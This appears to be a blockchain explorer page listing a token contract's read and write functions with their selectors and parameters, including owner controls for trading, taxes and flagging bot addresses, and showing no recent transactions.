decimals 0x313ce567 → uint8
initMCPOracle 0xc81972d5 → bool
isBot 0x3bbac579 → bool
name 0x06fdde03 → string
owner 0x8da5cb5b → address
printAboutInfo 0xde6699b7 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 12 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
clearStuckContractTokens 0x6945a76b
address _address
uint256 percent
enableTrading 0x8a8c523c
No parameters
manualSwap 0x51bc3c85
No parameters
reduceBuySellTax 0xb7316b53
uint256 _newBuyFee
uint256 _newSellFee
removeLimit 0x62256589
No parameters
removeMCPOracle 0x7708fc8f
address[] notbot
renounceOwnership 0x715018a6
No parameters
suspendMCPOracle 0xcbe320dc
address[] bots_
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
turnoffTransferTax 0x733df229
No parameters

Recent Transactions

No transactions found for this address